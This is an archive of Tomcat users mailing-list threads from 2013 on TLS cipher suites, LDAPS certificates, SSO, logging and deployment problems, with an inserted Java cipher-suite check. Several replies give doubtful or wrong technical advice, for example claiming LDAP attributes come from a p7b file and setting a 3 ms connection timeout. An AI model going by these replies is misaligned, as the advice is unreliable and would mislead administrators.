https://bugzilla.mozilla.org/show_bug.cgi?id=480514

Is this incorrect?

Martin

Date: Thu, 22 Aug 2013 14:53:55 +0100
Subject: Re: Tomcat 7 / Java 7 with TLS 1.2 algorithms
From: aterrest...@gmail.com
To: users@tomcat.apache.org

According to RFC 5246 Appendix C (TLS 1.2), there is no SHA384. See: http://www.ietf.org/rfc/rfc5246.txt

The JSSE Reference Guide also doesn't talk about this SHA384 as an implementation requirement. See: http://docs.oracle.com/javase/7/docs/technotes/guides/security/StandardNames.html#impl

This means you have a problem with SHA256 only. Maybe it's easier to test on client-side, with one of the following ciphers (that you find on the same Reference Guide) for example:

TLS_DH_RSA_WITH_AES_256_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256

Let me know if this works, or I will try to test by myself with my own client.

2013/8/22 Dennis Sosnoski d...@sosnoski.com:

I've already done that, though as far as I can see that doesn't affect the digest algorithms (only the encryption options).

- Dennis

On 08/23/2013 12:24 AM, Aurélien Terrestris wrote:

Hello

I suppose you need to run your JVM with the unrestricted policy files (on both client and server sides). You have to download them from Oracle website for your java version, and replace the old. These files are:

local_policy.jar
US_export_policy.jar

Regards

2013/8/22 d...@sosnoski.com:

Tomcat 7.0.40 seems to work well with TLS 1.2, forced by using a sslEnabledProtocols=TLSv1.2 attribute on the Connector. But I haven't been able to make it work with any of the SHA256/384 algorithms - they always show up in the Ignoring unsupported cipher suite list. I get the same thing happening when I try to use them from client code, so I know it's not a Tomcat issue, but I'm hoping someone knows a workaround.

Any suggestions?

Thanks,
- Dennis
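One way to check, from the JVM itself, what the thread above is arguing about: whether the TLSv1.2 context offers a given suite at all, whether it is enabled by default, and whether the installed JCE policy files cap AES key length. This is an added example, not code from any message in the thread; the class name Tls12SuiteCheck is made up here, and the default suite names are the two quoted in the thread.

```java
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.LinkedHashSet;
import java.util.Set;
import java.util.TreeSet;
import javax.crypto.Cipher;
import javax.net.ssl.SSLContext;

// Added example (hypothetical class name). Run it with the same JVM that runs Tomcat.
public class Tls12SuiteCheck {

    enum Status { ENABLED_BY_DEFAULT, SUPPORTED_BUT_NOT_ENABLED, UNSUPPORTED }

    // Classify one suite name against the JVM's supported and default-enabled sets.
    static Status classify(String suite, Set<String> supported, Set<String> enabled) {
        if (enabled.contains(suite)) {
            return Status.ENABLED_BY_DEFAULT;
        }
        return supported.contains(suite) ? Status.SUPPORTED_BUT_NOT_ENABLED : Status.UNSUPPORTED;
    }

    // Suites whose name ends in a SHA-2 digest, sorted for stable output.
    static Set<String> sha2Suites(String[] suites) {
        Set<String> out = new TreeSet<String>();
        for (String s : suites) {
            if (s.endsWith("_SHA256") || s.endsWith("_SHA384")) {
                out.add(s);
            }
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Default to the two suite names quoted in the thread; pass others as arguments.
        String[] requested = args.length > 0 ? args : new String[] {
            "TLS_DH_RSA_WITH_AES_256_CBC_SHA256",
            "TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"
        };

        SSLContext ctx;
        try {
            ctx = SSLContext.getInstance("TLSv1.2");
        } catch (NoSuchAlgorithmException e) {
            // A JVM without TLS 1.2 support cannot offer any TLS 1.2-only suite.
            System.out.println("No TLSv1.2 SSLContext in this JVM: " + e.getMessage());
            return;
        }
        ctx.init(null, null, null); // default key managers, trust managers and SecureRandom

        String[] supportedArr = ctx.getSupportedSSLParameters().getCipherSuites();
        Set<String> supported = new LinkedHashSet<String>(Arrays.asList(supportedArr));
        Set<String> enabled = new LinkedHashSet<String>(
                Arrays.asList(ctx.getDefaultSSLParameters().getCipherSuites()));

        System.out.println("java.version       : " + System.getProperty("java.version"));
        System.out.println("JSSE provider      : " + ctx.getProvider().getName());
        System.out.println("supported protocols: "
                + Arrays.toString(ctx.getSupportedSSLParameters().getProtocols()));

        // A finite value such as 128 means key-length-restricted policy files are
        // installed; Integer.MAX_VALUE means the unrestricted ones are in place.
        int maxAes = Cipher.getMaxAllowedKeyLength("AES");
        System.out.println("max AES key bits   : "
                + (maxAes == Integer.MAX_VALUE ? "unlimited" : String.valueOf(maxAes)));

        for (String suite : requested) {
            System.out.println(classify(suite, supported, enabled) + "  " + suite);
        }

        System.out.println("SHA256/SHA384 suites supported by this JVM:");
        for (String s : sha2Suites(supportedArr)) {
            System.out.println("  " + (enabled.contains(s) ? "[enabled]  " : "[disabled] ") + s);
        }
    }
}
```

A suite reported as UNSUPPORTED here cannot be turned on from the Connector; one reported as SUPPORTED_BUT_NOT_ENABLED has to be named explicitly in the Connector's cipher list.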
RE: Tomcat config question: 'compression' versus 'SSLDisableCompression'
as earlier mentioned chrome is the only browser that supports compression on SSL streams

Martin
__
Disclaimer and confidentiality notice: This message is confidential. If you are not the intended recipient, we kindly ask that you notify us. Any unauthorized forwarding or copying is prohibited. This message serves only for the exchange of information and has no legally binding effect. Because e-mails can easily be manipulated, we cannot accept any liability for the content.

Date: Thu, 8 Aug 2013 17:47:36 -0400
Subject: Re: Tomcat config question: 'compression' versus 'SSLDisableCompression'
From: dlan...@gmail.com
To: users@tomcat.apache.org

On Thu, Aug 8, 2013 at 5:19 PM, Christopher Schultz ch...@christopherschultz.net wrote:

... and the SSLDisableCompression setting (when set to false) is intended to mitigate the CRIME attack against SSL/TLS compression. Feel free to read online all about the CRIME attack.

That was what I was hoping it did when I asked the original question :)

I haven't really done any analysis of SSL compression (that is, compression as implemented by the TLS/SSL layer) alone versus compression-less-SSL + gzip, but I suspect that any combination of compression and encryption can lead to CRIME-like attacks ...

That seems to be true since there is now the BREACH attack: http://arstechnica.com/security/2013/08/gone-in-30-seconds-new-attack-plucks-secrets-from-https-protected-pages/ which (I think) is compression-less-SSL + gzip.
RE: LDAP/Realm with TLS in Tomcat 6/7?
you will need to supply any security credentials to that layer and inform the connector you are using protocol=TLS and match each attribute to attribute from the supplied key package (.pfx/.p7b)

http://tomcat.apache.org/tomcat-4.1-doc/ssl-howto.html

HTH,
Martin

Date: Tue, 6 Aug 2013 13:36:41 +0200
From: ognjen.d.blagoje...@gmail.com
To: users@tomcat.apache.org
Subject: Re: LDAP/Realm with TLS in Tomcat 6/7?

Jens,

On 6.8.2013 12:44, Jens Neu wrote:

is there a lib/method/whatever to achieve Realm Auth in Tomcat 5.x where username/password are protected by TLS?

I never tried it myself, but you might find these links useful:

https://wiki.apache.org/tomcat/JNDI_startTLs_HowTo
https://issues.apache.org/bugzilla/show_bug.cgi?id=49785
https://www.mail-archive.com/users@tomcat.apache.org/msg80660.html

org.apache.catalina.realm.JNDIRealm works with Tomcat 5, but not in 6 :-(

JNDIRealm should work just fine in any supported Tomcat version. If you have any problems with it, please report it here.

BTW, if you are already upgrading, you may consider to upgrade directly to latest Tomcat 7, to save yourself from doing two upgrades.

-Ognjen
RE: /META-INF/context.xml seemingly ignored
Nicholas

possibly CATALINA_BASE environment variable is missing?

http://blog.andrewbeacock.com/2007/08/getting-tomcat-contexts-to-work-in.html

gotta love those brit techs!

Martin

Subject: Re: /META-INF/context.xml seemingly ignored
From: nicho...@nicholaswilliams.net
Date: Sun, 4 Aug 2013 14:47:49 -0500
To: users@tomcat.apache.org

On Aug 4, 2013, at 11:16 AM, Konstantin Kolinko wrote:

2013/8/4 Mark Thomas ma...@apache.org:

On 04/08/2013 02:27, Nick Williams wrote:

Yes. There's a TOMCAT_HOME/work/Catalina/localhost/support directory, but TOMCAT_HOME/conf/Catalina is empty.

There should be conf/Catalina/localhost directory that is empty. (The Catalina directory is not empty).

Yes, my bad. conf/Catalina/localhost exists but is empty.

As expected for Tomcat 8. copyXML is false by default. (Yes the default has changed again.)

Huh? The copyXML is false by default in Tomcat 7 as well. I do not see any change here.

It might be good time to start migration guide page for Tomcat 8.

Agreed.

So, looking at this further, this might be an IntelliJ IDEA bug. I'm deploying the application using the Tomcat support in IDEA. IDEA creates a directory C:\Users\Nicholas\.IntelliJIdea12\system\tomcat\Unnamed_Customer-Support-v15\conf\Catalina\localhost and that directory contains support.xml with my context.xml contents. I'm betting it's not hooking that up properly. I'll research that route instead. Sorry if I've wasted anyone's time looking into this.

Nick
RE: Cert
Daniel

...he hasn't imported his DER typed certificate into the LDAP Server yet..

Martin

Subject: Re: Cert
From: dmik...@gopivotal.com
Date: Fri, 2 Aug 2013 08:58:12 -0400
To: users@tomcat.apache.org

On Aug 2, 2013, at 7:33 AM, Kyle Shattuck ky...@montcalm.edu wrote:

Hello, I am using Tomcat 7 on a windows server 2012 build for this: https://wiki.jasig.org/display/CASUM/Best+Practice+-+Setting+Up+CAS+Locally+using+the+Maven2+WAR+Overlay+Method

I don't think SSL is not working correctly because every time I try to authenticate over LDAPS it does not work.

What part of this doesn't work? Connecting via SSL or authentication via LDAP? They are two different things.

Can you connect to your server via HTTPS and access a static resource like an HTML page or image file? If not, what happens when you try to connect?

I created a .csr and a .jks using the java keytool. I got a cert using my .csr file from digicert by downloading it to a .p7b file. I imported the .p7b file to my %jave_home%\bin\mykeystore.jks. I then download from digicert the same cert but in a .pem file and imported the file to my %jave_home5\jre\lib\security\cacerts. Did I miss something here, do you need any other info?

- What is the specific version of Tomcat that you are using?
- Do you see any errors in the log?
- Include your server.xml, minus comments and minus any sensitive info like passwords

Dan

Thank you,
Kyle
RE: Cert
Kyle

the ldap server requires the LDAP Attributes contained within the p7b

    dn: cn=username,o=organization,c=country
    objectclass:inetorgperson
    objectclass:organizationalPerson
    cn: username
    sn: surname

your LDAP admin has 2 options:

1) enter each one manually from the attributes enumerated from the cert
2) import your DER formatted certificate into LDAP (and let the import utility auto-populate the LDAP attributes), for example
2a) Cisco LDAP Server http://www.cisco.com/en/US/docs/switches/datacenter/sw/6_x/nx-os/security/configuration/guide/b_Cisco_Nexus_7000_NX-OS_Security_Configuration_Guide__Release_6.x_chapter_0111.html
2b) IBM LDAP Server http://pic.dhe.ibm.com/infocenter/tivihelp/v2r1/index.jsp?topic=%2Fcom.ibm.itamfbi.doc_5.1%2FADM51mst160.htm

it looks like we will need to engage the LDAP admin to take this any further..can you cc him?

Martin

From: ky...@montcalm.edu
To: users@tomcat.apache.org
Subject: RE: Cert
Date: Fri, 2 Aug 2013 13:23:12 +

My Server (CAS) is using SSL and the LDAP (DC) server uses SSL. So when I try to authenticate through my CAS server to DC over LDAPS it does not work. When I look at the logs of the Applications and Services Logs --Directory Service it says--

Information ActiveDirectory_DomainService 1535 LDAP Interface: Internal event: The LDAP server returned an error.
Additional Data
Error value: 0003: LdapErr: DSID-0C060463, comment: Error decrypting ldap message, data 0, v1db1

Tomcat version: apache-tomcat-7.0.42

-Original Message-
From: Daniel Mikusa [mailto:dmik...@gopivotal.com]
Sent: Friday, August 02, 2013 8:59 AM
To: Tomcat Users List
Subject: Re: Cert

On Aug 2, 2013, at 7:33 AM, Kyle Shattuck ky...@montcalm.edu wrote:

Hello, I am using Tomcat 7 on a windows server 2012 build for this: https://wiki.jasig.org/display/CASUM/Best+Practice+-+Setting+Up+CAS+Locally+using+the+Maven2+WAR+Overlay+Method

I don't think SSL is not working correctly because every time I try to authenticate over LDAPS it does not work.

What part of this doesn't work? Connecting via SSL or authentication via LDAP? They are two different things.

Can you connect to your server via HTTPS and access a static resource like an HTML page or image file? If not, what happens when you try to connect?

I created a .csr and a .jks using the java keytool. I got a cert using my .csr file from digicert by downloading it to a .p7b file. I imported the .p7b file to my %jave_home%\bin\mykeystore.jks. I then download from digicert the same cert but in a .pem file and imported the file to my %jave_home5\jre\lib\security\cacerts. Did I miss something here, do you need any other info?

- What is the specific version of Tomcat that you are using?
- Do you see any errors in the log?
- Include your server.xml, minus comments and minus any sensitive info like passwords

Dan

Thank you,
Kyle
RE: java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx
    nslookup DomainName

if you still call no joy there is nothing we can do (without contacting your Domain Admin and asking if DomainName is live)

Martin

From: seema...@hotmail.com
To: users@tomcat.apache.org
Subject: RE: java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx
Date: Thu, 1 Aug 2013 12:02:34 +0100

Date: Thu, 1 Aug 2013 12:06:39 +0200
From: a...@ice-sa.com
To: users@tomcat.apache.org
Subject: Re: java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx

Seema Patel wrote:

Hi, I am not sure if this is the right List to post this on, please advise if it isn't and let me know where is best to post. I am getting the following error on one of our applications running on our intranet:

    2013-07-31 17:15:11,180 [http-xxx.xxx.x.xxx-xx-x] ERROR org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/forms].[action] - Servlet.service() for servlet action threw exception
    java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx.LOCAL
        at jcifs.smb.SmbSession.getChallengeForDomain(SmbSession.java:187)
        at jcifs.http.NtlmHttpFilter.negotiate(NtlmHttpFilter.java:150)
        at jcifs.http.NtlmHttpFilter.doFilter(NtlmHttpFilter.java:114)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188)
        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213)
        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:172)
        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:465)
        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)
        at org.apache.catalina.authenticator.SingleSignOn.invoke(SingleSignOn.java:393)
        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108)
        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:174)
        at org.apache.coyote.http11.Http11AprProcessor.process(Http11AprProcessor.java:837)
        at org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler.process(Http11AprProtocol.java:640)
        at org.apache.tomcat.util.net.AprEndpoint$Worker.run(AprEndpoint.java:1287)
        at java.lang.Thread.run(Unknown Source)

I believe that you should read this page carefully, in particular the blue text at the beginning: http://jcifs.samba.org/src/docs/ntlmhttpauth.html

Can you have a look at the WEB-INF/web.xml file *of your application*, and check if there is a servlet filter configured there, which matches the name above? If so, make a backup copy of that web.xml file, and then edit it to remove that filter from it, and try again.

I am not quite sure, but it looks possible to me that you have a duplicate authentication mechanism in use: one at the container (Tomcat) level, and one at the application level. And the one used at the application level is obsolete, unsupported, unmaintained etc..

I have found out that JCIFS is no longer supported, but it will take a lot of time, development and resources to update it to the recommended Jespa. In my web.xml file I have the following:

    <filter>
      <filter-name>NtlmHttpFilter</filter-name>
      <filter-class>jcifs.http.NtlmHttpFilter</filter-class>
      <!-- always needed for preauthentication / SMB signatures -->
      <init-param>
        <param-name>jcifs.smb.client.domain</param-name>
        <param-value>xxx</param-value>
      </init-param>
      <!-- SMB message signing
RE: SSL and 408 error code (incomplete request)
what happens if you increase the connectionTimeout (on your ssl connector) to a longer interval e.g.?

$CATALINA_HOME/conf/server.xml

    Connector port=8443 protocol=HTTP/1.1 SSLEnabled=true connectionTimeout=3

Martin

Date: Wed, 31 Jul 2013 14:32:39 -0700
From: solmy...@yahoo.com
Subject: SSL and 408 error code (incomplete request)
To: users@tomcat.apache.org

Hi,

Has anyone happened to stumble onto this issue, please: Our Ajax works perfectly as long as its non-secure. However, when switching to SSL we sometimes see 408 errors (incomplete request). This only happens on ajax, and inconsistently (similar requests might succeed on one moment, but fail on the other).

Please note:

1. Our client is Chrome browser, using JQuery for ajax
2. Server is Tomcat 7
3. Network is fast and stable, and the ajax requests are small
4. Problem occurs for both our connectors: APR and Http (both with SSL enabled)
5. Our x509 certificate is valid (otherwise it would have failed on *all* ajax ssl requests, not to mention the non-ajax ssl)

Thanks :)
RE: OSGi in Tomcat
asking your release manager to build an OSGI artifact with eclipse may be a bit of a stretch

if this is a live production-ready system then you will most likely be building at command-line with either ant or maven

the trickiest part is interfacing to BND start and BND stop which can be accomplished with Activator sample code seen here
http://wso2.com/library/tutorials/develop-osgi-bundles-using-maven-bundle-plugin

let's pick this thread on us...@maven.apache.org

Martin

Date: Wed, 24 Jul 2013 13:30:01 +0300
Subject: Re: OSGi in Tomcat
From: miles...@gmail.com
To: users@tomcat.apache.org

2013/7/23 Leonardo Torres wrote:

Thanks for the reply. Just one more question: if I want to use tomcat inside of OSGi environment, how can I do that?

Check Gemini Web documentation:

http://www.eclipse.org/gemini/web/documentation/
http://wiki.eclipse.org/Gemini/Web

Regards
Violeta
RE: OT: How to use JSP outside of tomcat
Documentation hasn't caught up with functionality so it's catch as catch can but this should get you to what you need

pom.xml

    <project>
      <modelVersion>4.0.0</modelVersion>
      <groupId>fu</groupId>
      <artifactId>bar</artifactId>
      <build>
        <plugins>
          <plugin>
            <groupId>org.codehaus.mojo.jspc</groupId>
            <artifactId>jspc-maven-plugin</artifactId>
            <configuration>
              <includeInProject>false</includeInProject>
              <sources>
                <directory>${basedir}/myapp/src/main/webapp/</directory>
                <includes>
                  <include>**/*.jsp</include>
                </includes>
              </sources>
              <source>1.6</source>
              <target>1.6</target>
            </configuration>
            <executions>
              <execution>
                <goals>
                  <goal>compile</goal>
                </goals>
              </execution>
            </executions>
          </plugin>
        </plugins>
      </build>
      ...
    </project>

    mvn -e -X compile

http://mojo.codehaus.org/jspc/jspc-compilers/jspc-compiler-tomcat6/index.html
http://mojo.codehaus.org/jspc/jspc-maven-plugin/usage.html

HTH
Martin Gainty

Date: Wed, 24 Jul 2013 13:22:36 -0400
Subject: OT: How to use JSP outside of tomcat
From: aryeh.fried...@gmail.com
To: users@tomcat.apache.org

I have a number of documents that are very template like and ideal for JSP that are 1) not intended for the web and 2) need to be automatically batch processed (the output stored in output files). How do I call the JSP processor from the command line? (it takes tomcat too long to see updated files for the purpose I have in mind)
RE: SingleSignOn valve enabled by default?
NO:

    <!-- /conf/server.xml -->
    <!-- SingleSignOn valve, share authentication between web applications
         Documentation at: /docs/config/valve.html -->
    <!--
    <Valve className="org.apache.catalina.authenticator.SingleSignOn" />
    -->

YES:

    <!-- /conf/server.xml -->
    <!-- SingleSignOn valve, share authentication between web applications
         Documentation at: /docs/config/valve.html -->
    <Valve className="org.apache.catalina.authenticator.SingleSignOn" />

Martin

Date: Fri, 19 Jul 2013 20:16:32 +0800
From: soul2zim...@gmail.com
To: users@tomcat.apache.org
Subject: SingleSignOn valve enabled by default?

Hi all,

I have an issue with SSO configuration in tomcat 7.0.42. According to the doc [1], it requires to enable SSO valve inside server.xml. However, without making such modification, I deployed two web-app test.war and test2.war (see attached file). Then, try to login from /test, after successful login, I don't need to login a second time for /test2 and can see the secured welcome page directly. That's strange for me, is the SingleSignOn valve enabled by default in tomcat?

FYI, I add following configuration in tomcat-user.xml

    <role rolename="User"/>
    <user username="test" password="pass.1234" roles="User"/>

If it's not a real issue, please point me how that works, and I'd like to know how could I set the reauthenticate parameter for SSO.

[1] http://tomcat.apache.org/tomcat-7.0-doc/config/host.html#Single_Sign_On

Thanks
Regards,
RE: ClassNotFoundException org.apache.juli.FileHandler in Tomcat 7.0.42 / OpenJDK 6 b27 (FreeBSD)
Matthias

MG this is what $CATALINA_HOME/conf/logging.properties is SUPPOSED to look like

    # Licensed to the Apache Software Foundation (ASF) under one or more
    # contributor license agreements. See the NOTICE file distributed with
    # this work for additional information regarding copyright ownership.
    # The ASF licenses this file to You under the Apache License, Version 2.0
    # (the "License"); you may not use this file except in compliance with
    # the License. You may obtain a copy of the License at
    #
    # http://www.apache.org/licenses/LICENSE-2.0
    #
    # Unless required by applicable law or agreed to in writing, software
    # distributed under the License is distributed on an "AS IS" BASIS,
    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    # See the License for the specific language governing permissions and
    # limitations under the License.

    handlers = 1catalina.org.apache.juli.FileHandler, 2localhost.org.apache.juli.FileHandler, 3manager.org.apache.juli.FileHandler, 4host-manager.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler

    .handlers = 1catalina.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler

    # Handler specific properties.
    # Describes specific configuration info for Handlers.

    1catalina.org.apache.juli.FileHandler.level = FINE
    1catalina.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
    1catalina.org.apache.juli.FileHandler.prefix = catalina.

    2localhost.org.apache.juli.FileHandler.level = FINE
    2localhost.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
    2localhost.org.apache.juli.FileHandler.prefix = localhost.

    3manager.org.apache.juli.FileHandler.level = FINE
    3manager.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
    3manager.org.apache.juli.FileHandler.prefix = manager.

    4host-manager.org.apache.juli.FileHandler.level = FINE
    4host-manager.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
    4host-manager.org.apache.juli.FileHandler.prefix = host-manager.

    java.util.logging.ConsoleHandler.level = FINE
    java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter

    # Facility specific properties.
    # Provides extra control for each logger.

    org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO
    org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers = 2localhost.org.apache.juli.FileHandler

    org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/manager].level = INFO
    org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/manager].handlers = 3manager.org.apache.juli.FileHandler

    org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/host-manager].level = INFO
    org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/host-manager].handlers = 4host-manager.org.apache.juli.FileHandler

    # For example, set the org.apache.catalina.util.LifecycleBase logger to log
    # each component that extends LifecycleBase changing state:
    #org.apache.catalina.util.LifecycleBase.level = FINE

Date: Sat, 13 Jul 2013 20:04:15 +0200
From: matth...@petermann-it.de
To: users@tomcat.apache.org
Subject: Re: ClassNotFoundException org.apache.juli.FileHandler in Tomcat 7.0.42 / OpenJDK 6 b27 (FreeBSD)

On 13.07.2013 16:07, Konstantin Kolinko wrote:

2013/7/13 Konstantin Kolinko knst.koli...@gmail.com:

2013/7/13 Matthias Petermann matth...@petermann-it.de:

Hello,

when I try to start Tomcat 7.0.42 with OpenJDK 6 b27, it complains about not finding classes for the logging handlers. I created a minimal logging.properties to narrow down the problem:

    handlers = 1catalina.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler
    .handlers = java.util.logging.ConsoleHandler
    1catalina.org.apache.juli.FileHandler.level = FINE
    1catalina.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
    1catalina.org.apache.juli.FileHandler.prefix = catalinatest.
    java.util.logging.ConsoleHandler.level = FINE
    java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
    org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO
    org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers = 1catalina.org.apache.juli.FileHandler

The output of ./catalina.sh run is the following:

    INFO: Starting Servlet Engine: Apache Tomcat/7.0.42
    Can't load log handler 1catalina.org.apache.juli.FileHandler
    java.lang.ClassNotFoundException: 1catalina.org.apache.juli.FileHandler
    java.lang.ClassNotFoundException: 1catalina.org.apache.juli.FileHandler
        at java.net.URLClassLoader$1.run(URLClassLoader.java:217)
        at java.security.AccessController.doPrivileged(Native Method)
RE: Memory limits for children processes when running Tomcat as service?
When you run your MS app standalone, how much heap and stack does this process occupy?
When TC starts up, how much heap and stack is left over for the standalone Microsoft app?
If you're not going to power up your machine with 8GB RAM and at least a tera of storage, your only solution is to configure your Microsoft Compound Documents to be opened, read and written using POI
https://poi.apache.org/

Keep us apprised,
Martin

From: j.tosov...@email.cz
To: users@tomcat.apache.org
Subject: RE: Memory limits for children processes when running Tomcat as service?
Date: Thu, 27 Jun 2013 21:24:03 +0200

On 2013-06-27 André Warnier wrote:
honyk wrote:
On 2013-06-26 André Warnier wrote:
honyk wrote:

Dear All,

I have a JSF2.0 app that executes (via ProcessBuilder) an external script. This script opens PPTX via PowerPoint ActiveX object, manipulates it and saves. It runs on Windows Server 2008 R2 64-bit, 4GB RAM, JDK 7. When tomcat 7 is launched using startup.bat (with original settings), it works fine. When tomcat runs as a service, opening the PPTX in PowerPoint fails because of an Out Of Memory error regardless of Xmx settings (tomcat7w.exe).

I originally asked the PowerPoint forum, but haven't got any explanation yet:
http://answers.microsoft.com/thread/37cbebf6-4003-4ab0-9295-92413aaecc2e

But as the entry point is Tomcat and the only difference between problematic and non problematic behavior is the 'service' mode, maybe there is something related in the tomcat7.exe code base. Just guessing. Has anybody an idea why both modes behave differently?

Hi.
The problem has nothing to do with Tomcat per se. It is due to running a Microsoft Office program (or library modules such as the Interop series) as a sub-process of a Windows Service (and thus in the same Service context) which is something that is not in the design of Microsoft Office, not supported by Microsoft, and even actively discouraged by Microsoft.
See : http://support.microsoft.com/kb/257757
The problem is basically that a Windows Service does not run in the same environment as a user session environment, and as they say in that article, you will certainly experience unstable behavior and/or deadlock somewhere, and will get no help for it.

I read this article but because I do not need interaction and my code doesn't run simultaneously and tomcat is launched using my credentials - I still thought it could be possible. Now realizing that tomcat launched using my credentials does not necessarily mean that Office uses the same...

Personal experience : some things will work with one MS-Office program, and totally fail with another; even simple things like opening or saving a file. It may work with one file, and fail with another, for no apparent reason. You get an OOM error in this case, but other cases may be file not found (although it's there) or whatever other bizarre failures. Ultimately it is unpredictable, frustrating and time-consuming.

I was an optimist when everything worked in the user mode...

Solutions :
1) instead of MS-Office, use LibreOffice or OpenOffice. Both can run in headless mode, and provide an API to have them do things with documents. And both can open and manipulate MS-Office documents. Depending on what you do, there may be some differences in the results, but it works fine for many things. Or try one of the other solutions suggested in the above article. (I have not tried them, I use OpenOffice/LibreOffice).

I'll give it a try. I originally tested Apache POI, but required functionality is not implemented yet.

2) do not run Tomcat as a Service. Create a virtual Windows machine, and run it in a user console (with startup.bat). You can restrict access to the VM, and since it is a VM, it can run unattended, just as a service would. (I am also using this scheme, when circumstances permit). But in that case, also pay attention to the licensing considerations at the end of the article.

I am quite lost in this ;-) But I'll investigate further.

Thanks a lot for your exhaustive analysis! Finally it looks like my way is no way :-)

No problem. I went myself through the exact same issues as you described, I did believe that there must be a workaround, tried a number of things with great loss of time, and finally had to admit that the MS article was right and that there is no good solution with MS-Office when starting it from a Service.

I appreciate a lot your response and sharing your experience. Without it I would spend many additional hours of investigating, trial and error attempts, asking the same topic in different places, all this in heavy frustration...

About the Virtual Machine solution : usually, when you want something
RE: forward request by changing the port in request url
For IP redirecting and/or automatic Network Address Translations (e.g. Port 80 redirects to Port 81) you will need a proxy server.
Please contact supp...@cisco.com for product and service options.

Good luck
Martin
__
Disclaimer and confidentiality note
This message is confidential. If you are not the intended recipient, we kindly ask you to notify us. Any unauthorized forwarding or copying is prohibited. This message serves only to exchange information and has no legally binding effect. Because e-mails can easily be manipulated, we cannot accept any liability for the content.

From: anigo...@cisco.com
To: users@tomcat.apache.org
Subject: forward request by changing the port in request url
Date: Thu, 13 Jun 2013 18:00:12 +

I have two services running under Tomcat. One service is the default, i.e. catalina on ports 8080 and 8443; the second service is catalina_new on ports 8081 and 8444. I have application abc.war deployed in the webapps_new service, which is running on port 8081. This application is not there in webapps. I want any request coming in on port 8080 for application abc to be forwarded to port 8081 (same for SSL port 8443-8444). Is there any way to do this?

Thanks
Anil
RE: Class cast exception when starting tomcat 7.0.1
you can swap out one jar for another
Ant has no idea which container it is communicating with unless you tell it
catalina.jar is tied to the Servlet Spec so you cannot change catalina unless you change the accompanying Servlet Spec
so you've already done that
why not write a Quick and Dirty ant taskdef
I'll pick this up on us...@ant.apache.org

Good luck
Martin Gainty

From: jm...@rocketsoftware.com
To: users@tomcat.apache.org
Subject: RE: Class cast exception when starting tomcat 7.0.1
Date: Thu, 13 Jun 2013 20:19:07 +

I had catalina.jar in WEB-INF/lib. It's needed because we have an implementation of Realm to store an encrypted tomcat password users enter in the webapp. If I remove it and add the catalina.jar from tomcat_home/lib to the classpath, I have to change the signature from org.apache.catalina.realm.RealmBase.Digest(String, String) to org.apache.catalina.realm.RealmBase.Digest(String, String, String). Then the code compiles ok, but I get this error when building with ant to make a war file:

error: method Digest in class RealmBase cannot be applied to given types;
[javac] encryptedOldPwd = RealmBase.Digest(oldTomcatPassword, digestAlg,null);

Should I not be writing code that needs classes from catalina.jar?

Thanks,
Jane

-Original Message-
From: Christopher Schultz [mailto:ch...@christopherschultz.net]
Sent: Thursday, June 13, 2013 11:09 AM
To: Tomcat Users List
Subject: Re: Class cast exception when starting tomcat 7.0.1

Jane,

On 6/13/13 12:38 PM, Jane Muse wrote:
In the archives I thought the only unreleased versions would be specified beta. Please let me know if this is not the case.

I'll admit it's not clear from the version number which versions are beta, released, etc. You have to look at the ChangeLog:

http://tomcat.apache.org/tomcat-7.0-doc/changelog.html

Each release contains a release date and (optionally) a comment on the quality of the build. The first non-beta version of Tomcat 7.0.x was 7.0.6. Tomcat 7.0.1 (distinct from 7.0.10) was actually not released probably because it was broken for some reason. When the Tomcat team rolls a release, there is a vote. If there aren't enough yes votes (or any no votes), the release is abandoned but the number isn't re-used.

Anyhow, there's no reason to attempt to migrate from Tomcat 6.0.x to Tomcat 7.0.x by shooting for an early version of Tomcat 7.0.x: you should go for the latest.

Also, if you mistype and say Tomcat 7.0.1 instead of Tomcat 7.0.10 or Tomcat 7.0.4 instead of Tomcat 7.0.40 (or Tomcat 7.0.41), don't get offended when people tell you you are doing it wrong. Just say whoops, I meant 7.0.40 and move on.

Back to your original problem... have you modified the Tomcat 7 installation in any way -- other than dropping your WAR file/exploded WAR into the webapps/ directory)? Also, do you have any Tomcat-related JAR files in your webapp's WEB-INF/lib directory?

-chris
RE: Customizing SSL in HttpClient
Anil

